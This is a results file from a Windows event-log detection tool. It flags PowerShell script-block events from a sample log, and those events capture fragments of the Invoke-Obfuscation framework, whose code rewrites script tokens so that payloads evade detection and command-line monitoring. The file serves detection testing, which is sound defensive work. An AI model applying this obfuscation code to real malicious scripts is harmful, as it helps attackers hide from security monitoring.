+2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"} ElseIf(($Token.Type -eq 'Command') -AND ($TokenTypeToObfuscate.ToLower() -eq 'command')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # If a variable is encapsulated in curly braces (e.g. ${ExecutionContext}) then the string inside is treated as a Command token. # So we will force tick obfuscation (option 1) instead of splatting (option 2) as that would cause errors. If(($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '{') -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '}')) { $ObfuscationLevel = 1 } Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} 3 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Variable') -AND ($TokenTypeToObfuscate.ToLower() -eq 'variable')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Type') -AND ($TokenTypeToObfuscate.ToLower() -eq 'type')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Type value substrings are part of Types that cannot be direct Type casted, so we will not perform direct Type casting on Types containing these values. $TypesThatCannotByDirectTypeCasted = @() $TypesThatCannotByDirectTypeCasted += 'directoryservices.accountmanagement.' $TypesThatCannotByDirectTypeCasted += 'windows.clipboard' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($TokensForInsertingWhitespace -Contains $Token.Type) -AND ($TokenTypeToObfuscate.ToLower() -eq 'randomwhitespace')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Comment') -AND ($TokenTypeToObfuscate.ToLower() -eq 'comment')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RemoveComments $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } } Return $ScriptString } Function Out-ObfuscatedStringTokenLevel1 { <# .SYNOPSIS Obfuscates string token by randomly concatenating the string in-line. Invoke-Obfuscation Function: Out-ObfuscatedStringTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringTokenLevel1 obfuscates a given string token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the String token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host ('Hello'+' W'+'orl'+'d!') -ForegroundColor Green; Write-Host ('Obfuscation R'+'oc'+'k'+'s'+'!') -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host (""{2}{3}{0}{1}"" -f 'Wo','rld!','Hel','lo ') -ForegroundColor Green; Write-Host (""{4}{0}{3}{2}{1}""-f 'bfusca','cks!','Ro','tion ','O') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'String' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE # Extract substring to look for parameter binding values to check against $ParameterValidationAttributesToTreatStringAsScriptblock set in the beginning of this script. $SubStringLength = 25 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Replace(' ','').Replace(""`t"",'').Replace(""`n"",'') $SubStringLength = 5 If($SubString.Length -lt $SubStringLength) { $SubStringLength = $SubString.Length } $SubString = $SubString.SubString($SubString.Length-$SubStringLength,$SubStringLength) # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($SubString.Contains('(') -OR $SubString.Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('(')) { # Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock. $ParameterBindingName = $ScriptString.SubString(0,$Token.Start) $ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('(')) $ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim() # Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc. If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0)) { # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower()) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } ElseIf(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND $ScriptString.SubString($Token.Start-5,5).Contains('=')) { # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. ForEach($Parameter in $ParameterValidationAttributesToTreatStringAsScriptblock) { $SubStringLength = $Parameter.Length # Add 10 more to $SubStringLength in case there is excess whitespace between the = sign. $SubStringLength += 10 # Shorten substring length in case there is not enough room depending on the location of the token in the $ScriptString. If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring to compare against $EncapsulateAsScriptBlockInsteadOfParentheses. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength+1).Trim() # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($SubString -Match ""$Parameter.*="") { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } # Do nothing if the token has length <= 1 (e.g. Write-Host """", single-character tokens, etc.). If($Token.Content.Length -le 1) {Return $ScriptString} # Do nothing if the token has length <= 3 and $ObfuscationLevel is 2 (reordering). If(($Token.Content.Length -le 3) -AND $ObfuscationLevel -eq 2) {Return $ScriptString} # Do nothing if $Token.Content already contains a { or } to avoid parsing errors when { and } are introduced into substrings. If($Token.Content.Contains('{') -OR $Token.Content.Contains('}')) {Return $ScriptString} # If the Token is 'invoke' then do nothing. This is because .invoke() is treated as a member but .""invoke""() is treated as a string. If($Token.Content.ToLower() -eq 'invoke') {Return $ScriptString} # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # Tokenizer removes ticks from strings, but we want to keep them. So we will replace the contents of $Token.Content with the manually extracted token data from the original $ScriptString. $TokenContent = $ScriptString.SubString($Token.Start+1,$Token.Length-2) # If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way. # Must come back and address this after vacation. # Variable can be displaying or setting: ""setting var like $($var='secret') and now displaying $var"" # For now just split on whitespace instead of passing to Out-Concatenated If($TokenContent.Contains('$') -OR $TokenContent.Contains('`')) { $ObfuscatedToken = '' $Counter = 0 # If special use case is met then don't substring the current Token to avoid errors. # The special cases involve a double-quoted string containing a variable or a string-embedded-command that contains whitespace in it. # E.g. ""string ${var name with whitespace} string"" or ""string $(gci *whitespace_in_command*) string"" $TokenContentSplit = $TokenContent.Split(' ') $ContainsVariableSpecialCases = (($TokenContent.Contains('$(') -OR $TokenContent.Contains('${')) -AND ($ScriptString[$Token.Start] -eq '""')) If($ContainsVariableSpecialCases) { $TokenContentSplit = $TokenContent } ForEach($SubToken in $TokenContentSplit) { $Counter++ $ObfuscatedSubToken = $SubToken # Determine if use case of variable inside of double quotes is present as this will be handled differently below. $SpecialCaseContainsVariableInDoubleQuotes = (($ObfuscatedSubToken.Contains('$') -OR $ObfuscatedSubToken.Contains('`')) -AND ($ScriptString[$Token.Start] -eq '""')) # Since splitting on whitespace removes legitimate whitespace we need to add back whitespace for all but the final subtoken. If($Counter -lt $TokenContent.Split(' ').Count) { $ObfuscatedSubToken = $ObfuscatedSubToken + ' ' } # Concatenate $SubToken if it's long enough to be concatenated. If(($ObfuscatedSubToken.Length -gt 1) -AND !($SpecialCaseContainsVariableInDoubleQuotes)) { # Concatenate each $SubToken via Out-StringDelimitedAndConcatenated so it will handle any replacements for special characters. # Define -PassThru flag so an invocation is not added to $ObfuscatedSubToken. $ObfuscatedSubToken = Out-StringDelimitedAndConcatenated $ObfuscatedSubToken -PassThru # Evenly trim leading/trailing parentheses. While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')')) { $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim() } } Else { If($SpecialCaseContainsVariableInDoubleQuotes) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } ElseIf($ObfuscatedSubToken.Contains(""'"") -OR $ObfuscatedSubToken.Contains('$')) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } Else { $ObfuscatedSubToken = ""'"" + $ObfuscatedSubToken + ""'"" } } # Add obfuscated/trimmed $SubToken back to $ObfuscatedToken if a Replace operati",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"} ElseIf(($Token.Type -eq 'Command') -AND ($TokenTypeToObfuscate.ToLower() -eq 'command')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # If a variable is encapsulated in curly braces (e.g. ${ExecutionContext}) then the string inside is treated as a Command token. # So we will force tick obfuscation (option 1) instead of splatting (option 2) as that would cause errors. If(($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '{') -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '}')) { $ObfuscationLevel = 1 } Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} 3 {$ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Variable') -AND ($TokenTypeToObfuscate.ToLower() -eq 'variable')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Type') -AND ($TokenTypeToObfuscate.ToLower() -eq 'type')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Type value substrings are part of Types that cannot be direct Type casted, so we will not perform direct Type casting on Types containing these values. $TypesThatCannotByDirectTypeCasted = @() $TypesThatCannotByDirectTypeCasted += 'directoryservices.accountmanagement.' $TypesThatCannotByDirectTypeCasted += 'windows.clipboard' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($TokensForInsertingWhitespace -Contains $Token.Type) -AND ($TokenTypeToObfuscate.ToLower() -eq 'randomwhitespace')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Comment') -AND ($TokenTypeToObfuscate.ToLower() -eq 'comment')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RemoveComments $ScriptString $Token} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } } Return $ScriptString } Function Out-ObfuscatedStringTokenLevel1 { <# .SYNOPSIS Obfuscates string token by randomly concatenating the string in-line. Invoke-Obfuscation Function: Out-ObfuscatedStringTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringTokenLevel1 obfuscates a given string token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the String token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host ('Hello'+' W'+'orl'+'d!') -ForegroundColor Green; Write-Host ('Obfuscation R'+'oc'+'k'+'s'+'!') -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'String'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host (""{2}{3}{0}{1}"" -f 'Wo','rld!','Hel','lo ') -ForegroundColor Green; Write-Host (""{4}{0}{3}{2}{1}""-f 'bfusca','cks!','Ro','tion ','O') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'String' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $EncapsulateAsScriptBlockInsteadOfParentheses = $FALSE # Extract substring to look for parameter binding values to check against $ParameterValidationAttributesToTreatStringAsScriptblock set in the beginning of this script. $SubStringLength = 25 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Replace(' ','').Replace(""`t"",'').Replace(""`n"",'') $SubStringLength = 5 If($SubString.Length -lt $SubStringLength) { $SubStringLength = $SubString.Length } $SubString = $SubString.SubString($SubString.Length-$SubStringLength,$SubStringLength) # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. If(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND ($SubString.Contains('(') -OR $SubString.Contains(',')) -AND $ScriptString.SubString(0,$Token.Start).Contains('[') -AND $ScriptString.SubString(0,$Token.Start).Contains('(')) { # Gather substring preceding the current String token to see if we need to treat the obfuscated string as a scriptblock. $ParameterBindingName = $ScriptString.SubString(0,$Token.Start) $ParameterBindingName = $ParameterBindingName.SubString(0,$ParameterBindingName.LastIndexOf('(')) $ParameterBindingName = $ParameterBindingName.SubString($ParameterBindingName.LastIndexOf('[')+1).Trim() # Filter out values that are not Parameter Binding due to contain whitespace, some special characters, etc. If(!$ParameterBindingName.Contains(' ') -AND !$ParameterBindingName.Contains('.') -AND !$ParameterBindingName.Contains(']') -AND !($ParameterBindingName.Length -eq 0)) { # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($ParameterValidationAttributesToTreatStringAsScriptblock -Contains $ParameterBindingName.ToLower()) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } ElseIf(($ObfuscationLevel -gt 1) -AND ($Token.Start -gt 5) -AND $ScriptString.SubString($Token.Start-5,5).Contains('=')) { # If dealing with ObfuscationLevel -gt 1 (e.g. -f format operator), perform check to see if we're dealing with a string that is part of a Parameter Binding. ForEach($Parameter in $ParameterValidationAttributesToTreatStringAsScriptblock) { $SubStringLength = $Parameter.Length # Add 10 more to $SubStringLength in case there is excess whitespace between the = sign. $SubStringLength += 10 # Shorten substring length in case there is not enough room depending on the location of the token in the $ScriptString. If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring to compare against $EncapsulateAsScriptBlockInsteadOfParentheses. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength+1).Trim() # If we have a match then set boolean to True so result will be encapsulated with curly braces at the end of this function. If($SubString -Match ""$Parameter.*="") { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } } } # Do nothing if the token has length <= 1 (e.g. Write-Host """", single-character tokens, etc.). If($Token.Content.Length -le 1) {Return $ScriptString} # Do nothing if the token has length <= 3 and $ObfuscationLevel is 2 (reordering). If(($Token.Content.Length -le 3) -AND $ObfuscationLevel -eq 2) {Return $ScriptString} # Do nothing if $Token.Content already contains a { or } to avoid parsing errors when { and } are introduced into substrings. If($Token.Content.Contains('{') -OR $Token.Content.Contains('}')) {Return $ScriptString} # If the Token is 'invoke' then do nothing. This is because .invoke() is treated as a member but .""invoke""() is treated as a string. If($Token.Content.ToLower() -eq 'invoke') {Return $ScriptString} # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # Tokenizer removes ticks from strings, but we want to keep them. So we will replace the contents of $Token.Content with the manually extracted token data from the original $ScriptString. $TokenContent = $ScriptString.SubString($Token.Start+1,$Token.Length-2) # If a variable is present in a string, more work needs to be done to extract from string. Warning maybe should be thrown either way. # Must come back and address this after vacation. # Variable can be displaying or setting: ""setting var like $($var='secret') and now displaying $var"" # For now just split on whitespace instead of passing to Out-Concatenated If($TokenContent.Contains('$') -OR $TokenContent.Contains('`')) { $ObfuscatedToken = '' $Counter = 0 # If special use case is met then don't substring the current Token to avoid errors. # The special cases involve a double-quoted string containing a variable or a string-embedded-command that contains whitespace in it. # E.g. ""string ${var name with whitespace} string"" or ""string $(gci *whitespace_in_command*) string"" $TokenContentSplit = $TokenContent.Split(' ') $ContainsVariableSpecialCases = (($TokenContent.Contains('$(') -OR $TokenContent.Contains('${')) -AND ($ScriptString[$Token.Start] -eq '""')) If($ContainsVariableSpecialCases) { $TokenContentSplit = $TokenContent } ForEach($SubToken in $TokenContentSplit) { $Counter++ $ObfuscatedSubToken = $SubToken # Determine if use case of variable inside of double quotes is present as this will be handled differently below. $SpecialCaseContainsVariableInDoubleQuotes = (($ObfuscatedSubToken.Contains('$') -OR $ObfuscatedSubToken.Contains('`')) -AND ($ScriptString[$Token.Start] -eq '""')) # Since splitting on whitespace removes legitimate whitespace we need to add back whitespace for all but the final subtoken. If($Counter -lt $TokenContent.Split(' ').Count) { $ObfuscatedSubToken = $ObfuscatedSubToken + ' ' } # Concatenate $SubToken if it's long enough to be concatenated. If(($ObfuscatedSubToken.Length -gt 1) -AND !($SpecialCaseContainsVariableInDoubleQuotes)) { # Concatenate each $SubToken via Out-StringDelimitedAndConcatenated so it will handle any replacements for special characters. # Define -PassThru flag so an invocation is not added to $ObfuscatedSubToken. $ObfuscatedSubToken = Out-StringDelimitedAndConcatenated $ObfuscatedSubToken -PassThru # Evenly trim leading/trailing parentheses. While($ObfuscatedSubToken.StartsWith('(') -AND $ObfuscatedSubToken.EndsWith(')')) { $ObfuscatedSubToken = ($ObfuscatedSubToken.SubString(1,$ObfuscatedSubToken.Length-2)).Trim() } } Else { If($SpecialCaseContainsVariableInDoubleQuotes) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } ElseIf($ObfuscatedSubToken.Contains(""'"") -OR $ObfuscatedSubToken.Contains('$')) { $ObfuscatedSubToken = '""' + $ObfuscatedSubToken + '""' } Else { $ObfuscatedSubToken = ""'"" + $ObfuscatedSubToken + ""'"" } } # Add obfuscated/trimmed $SubToken back to $ObfuscatedToken if a Replace operati",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"on was used. If($ObfuscatedSubToken -eq $PreObfuscatedSubToken) { # Same, so don't encapsulate. And maybe take off trailing whitespace? } ElseIf($ObfuscatedSubToken.ToLower().Contains(""replace"")) { $ObfuscatedToken += ( '(' + $ObfuscatedSubToken + ')' + '+' ) } Else { $ObfuscatedToken += ($ObfuscatedSubToken + '+' ) } } # Trim extra whitespace and trailing + from $ObfuscatedToken. $ObfuscatedToken = $ObfuscatedToken.Trim(' + ') } Else { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses. # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] $SubStringStart = 30 If($Token.Start -lt $SubStringStart) { $SubStringStart = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower() If($SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } If($SubString.Contains('parametersetname') -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks. # Otherwise we may get errors depending on the version of PowerShell being run. $ObfuscatedToken = $Token.Content $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null) $ObfuscatedToken = '""' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '""' } Else { # User input $ObfuscationLevel (1-2) will choose between concatenating String token value string or reordering it with the -f format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Token Obfuscation.""; Exit} } } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } } # Encapsulate concatenated string with parentheses to avoid garbled string in scenarios like Write-* methods. If($ObfuscatedToken.Length -ne ($TokenContent.Length + 2)) { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we 